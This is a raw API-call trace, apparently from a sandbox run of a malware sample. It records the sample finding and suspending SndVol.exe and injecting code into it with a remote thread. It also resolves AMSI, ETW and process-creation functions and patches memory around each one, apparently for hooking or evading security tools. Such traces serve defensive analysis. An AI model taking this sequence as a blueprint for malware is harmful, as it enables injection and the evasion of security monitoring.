Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="two_cancer.exe")) returned 1 [0143.235] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="two_cancer.exe", cchCount1=14, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.235] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1008, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="weight.exe")) returned 1 [0143.236] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="weight.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.236] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0143.238] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="involve.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.238] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1020, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="artist_under.exe")) returned 1 [0143.239] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="artist_under.exe", cchCount1=16, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.239] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1030, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenge.exe")) returned 1 [0143.241] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="challenge.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.241] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0143.242] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.242] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0143.243] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.243] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0143.245] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="msfeedssync.exe", cchCount1=15, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.245] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0143.246] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.246] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.248] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="audiodg.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.248] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x13ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 1 [0143.249] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe", cchCount1=68, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.249] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0143.250] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.250] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x13ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="SndVol.exe")) returned 1 [0143.252] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="SndVol.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 2 [0143.252] CloseHandle (hObject=0x650) returned 1 [0143.252] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc60) returned 0x650 [0143.252] NtSuspendProcess (ProcessHandle=0x650) returned 0x0 [0143.252] VirtualFree (lpAddress=0x50480000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.253] VirtualAllocEx (hProcess=0x650, lpAddress=0x50480000, dwSize=0x2f000, flAllocationType=0x3000, flProtect=0x40) returned 0x50480000 [0143.259] VirtualAlloc (lpAddress=0x50480000, dwSize=0x2f000, flAllocationType=0x2000, flProtect=0x1) returned 0x50480000 [0143.259] VirtualAlloc (lpAddress=0x50480000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x50480000 [0143.260] VirtualAlloc (lpAddress=0x50481000, dwSize=0x2d054, flAllocationType=0x1000, flProtect=0x4) returned 0x50481000 [0143.265] WriteProcessMemory (in: hProcess=0x650, lpBaseAddress=0x50480000, lpBuffer=0x50480000*, nSize=0x2f000, lpNumberOfBytesWritten=0x416f750 | out: lpBuffer=0x50480000*, lpNumberOfBytesWritten=0x416f750*=0x2f000) returned 1 [0143.273] VirtualAllocEx (hProcess=0x650, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x30000 [0143.274] WriteProcessMemory (in: hProcess=0x650, lpBaseAddress=0x30000, lpBuffer=0x416f754*, nSize=0x8, lpNumberOfBytesWritten=0x416f6e8 | out: lpBuffer=0x416f754*, lpNumberOfBytesWritten=0x416f6e8*=0x8) returned 1 [0143.275] VirtualAllocEx (hProcess=0x650, lpAddress=0x0, dwSize=0x19e, flAllocationType=0x3000, flProtect=0x40) returned 0x190000 [0143.276] WriteProcessMemory (in: hProcess=0x650, lpBaseAddress=0x190000, lpBuffer=0x4d4493c*, nSize=0x19e, lpNumberOfBytesWritten=0x416f6e8 | out: lpBuffer=0x4d4493c*, lpNumberOfBytesWritten=0x416f6e8*=0x19e) returned 1 [0143.277] CreateRemoteThread (in: hProcess=0x650, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x190000, lpParameter=0x30000, dwCreationFlags=0x0, lpThreadId=0x416f70c | out: lpThreadId=0x416f70c*=0xc6c) returned 0x654 [0143.278] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0143.279] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0143.280] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0143.280] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.282] GetCurrentProcess () returned 0xffffffff [0143.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.282] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.283] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0143.283] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0143.284] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0143.284] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0143.284] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.287] GetCurrentProcess () returned 0xffffffff [0143.287] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.287] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.287] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0143.288] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0143.288] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0143.289] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0143.298] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.300] GetCurrentProcess () returned 0xffffffff [0143.300] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.300] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.301] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0143.301] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.302] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.302] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessAsUserA") returned 0x76760770 [0143.302] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.304] GetCurrentProcess () returned 0xffffffff [0143.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.304] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.309] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.309] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.312] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.313] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessAsUserW") returned 0x76760790 [0143.313] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.317] GetCurrentProcess () returned 0xffffffff [0143.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.317] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.317] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.317] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.318] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.318] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0143.318] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.322] GetCurrentProcess () returned 0xffffffff [0143.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.322] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.323] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.323] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.323] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.324] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessW") returned 0x7673b000 [0143.324] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.327] GetCurrentProcess () returned 0xffffffff [0143.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.327] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.327] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.327] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.328] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.328] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessInternalA") returned 0x767607b0 [0143.328] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.330] GetCurrentProcess () returned 0xffffffff [0143.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.330] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.330] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.330] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.331] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.331] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessInternalW") returned 0x767607d0 [0143.331] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.334] GetCurrentProcess () returned 0xffffffff [0143.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.334] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.334] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.334] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.335] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.335] GetProcAddress (hModule=0x76720000, lpProcName="createRemoteThread") returned 0x0 [0143.335] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.337] GetCurrentProcess () returned 0xffffffff [0143.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.338] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.338] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.338] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.338] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.339] GetProcAddress (hModule=0x76720000, lpProcName="writeProcessMemory") returned 0x0 [0143.339] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.342] GetCurrentProcess () returned 0xffffffff [0143.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.342] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.343] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.343] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.344] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.345] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0143.345] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.349] GetCurrentProcess () returned 0xffffffff [0143.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.349] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.350] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.350] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0143.351] GetModuleHandleA (lpModuleName="kernel32") returned 0x76720000 [0143.351] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0143.351] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.356] GetCurrentProcess () returned 0xffffffff [0143.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.356] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.356] FreeLibrary (hLibModule=0x767200ff) returned 0 [0143.356] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.357] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.358] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessAsUserA") returned 0x76a4bb10 [0143.358] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.361] GetCurrentProcess () returned 0xffffffff [0143.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.361] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.362] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.362] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.363] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.363] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessAsUserW") returned 0x76a4bb50 [0143.363] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.366] GetCurrentProcess () returned 0xffffffff [0143.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.366] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.367] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.373] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.374] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.374] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76a4bad0 [0143.374] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.379] GetCurrentProcess () returned 0xffffffff [0143.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.379] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.379] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.379] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.380] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.380] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x769cf930 [0143.380] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.384] GetCurrentProcess () returned 0xffffffff [0143.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.384] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.385] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.385] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.385] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.386] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessInternalA") returned 0x76a4bb90 [0143.386] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.389] GetCurrentProcess () returned 0xffffffff [0143.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.389] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.390] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.390] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.391] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.391] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessInternalW") returned 0x769cf970 [0143.391] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.394] GetCurrentProcess () returned 0xffffffff [0143.394] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.395] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.395] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.395] LoadLibraryA (lpLibFileName="KernelBase") returned 0x76910000 [0143.396] GetModuleHandleA (lpModuleName="KernelBase") returned 0x76910000 [0143.396] GetProcAddress (hModule=0x76910000, lpProcName="createRemoteThread") returned 0x0 [0143.396] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.400] GetCurrentProcess () returned 0xffffffff [0143.400] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.400] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.400] FreeLibrary (hLibModule=0x769100ff) returned 0 [0143.400] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.401] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.402] GetProcAddress (hModule=0x771d0000, lpProcName="NtQueryInformationThread") returned 0x77246ef0 [0143.402] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.405] GetCurrentProcess () returned 0xffffffff [0143.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.405] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.406] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0143.406] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.406] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.407] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0143.407] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.411] GetCurrentProcess () returned 0xffffffff [0143.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.411] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.411] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0143.411] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.412] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.413] GetProcAddress (hModule=0x771d0000, lpProcName="NtCreateFile") returned 0x772471f0 [0143.413] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.416] GetCurrentProcess () returned 0xffffffff [0143.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.416] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.416] FreeLibrary (hLibModule=0x771d00ff) returned 0 [0143.416] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0143.417] GetModuleHandleA (lpModuleName="ntdll") returned 0x771d0000 [0143.418] GetProcAddress (hModule=0x771d0000, lpProcName="EtwEventWriteEx") returned 0x771f3290 [0143.418] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0143.423] GetCurrentProcess () returned 0xffffffff [0143.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0143.423] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0143.423] FreeLibrary (hLibModule=0x771d00ff) returned 0 